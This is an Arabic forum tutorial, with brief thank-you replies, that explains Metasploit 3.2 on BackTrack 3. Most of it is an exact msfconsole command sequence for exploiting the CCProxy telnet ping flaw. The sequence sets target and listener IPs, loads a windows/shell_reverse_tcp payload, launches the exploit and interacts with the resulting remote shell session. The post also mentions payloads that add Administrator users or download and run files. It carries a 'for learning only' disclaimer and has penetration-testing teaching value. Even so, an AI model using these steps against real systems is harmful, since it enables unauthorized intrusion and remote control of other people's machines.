![]() |
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-framework.png[/IMG] بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا… لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك! نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit في توزيعة BackTrack 3 سيكون المشروع في المسار التالي: كود: /pentest/exploits/framework3/ كود: ./msfconsole أول ما يبدأ سطر أوامر Metasploit يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي: كود: msf > help ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة كود: msf > show exploits كود: msf > show exploits كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك: كود: msf > info windows/proxy/ccproxy_telnet_ping [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-4-500x359.png[/IMG] قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة كود: msf > use windows/proxy/ccproxy_telnet_ping كود: msf exploit(ccproxy_telnet_ping) > show options [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-5-500x359.png[/IMG] أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر: كود: msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53 كود: msf exploit(ccproxy_telnet_ping) > set RPORT 34 كود: msf exploit(ccproxy_telnet_ping) > show targets كود: msf exploit(ccproxy_telnet_ping) > set TARGET 4 أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر: كود: msf exploit(ccproxy_telnet_ping) > show payloads كود: msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر: كود: msf exploit(ccproxy_telnet_ping) > show options [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-8-500x359.png[/IMG] يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر: كود: msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41 كود: msf exploit(ccproxy_telnet_ping) > exploit كود: msf > sessions -l كود: msf > sessions -i 1 كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-9-500x359.png[/IMG] الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit . كود: /msfgui كود: http://127.0.0.1:55555 كود: class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote كود: /home/USER/.msf3/ كود: /home/USER/.msf3/modules/exploits كود: /home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb [IMG]http://br4v3-h34r7.com/wp-*******/uploads/2008/08/metasploit-11-500x359.png[/IMG] أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي: كود: svn update جميع الحقوق محفوظة ل.Br4v3-H34r7 |
مشكووور على الطريقة |
شكرا اخي ولكن فيه كلمات مشفرة |
شكرا على الشرح |
تسلم يدك اخي شكراً جزيلاً لك |
مشكووور على الطريقةشكرا |
مشكوررررررررررر |
مشكورررررر |
شكراشكرا |
رد: استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل شكرا على الشرح |
الساعة الآن 04:40 PM |
[ vBspiders.Com Network ]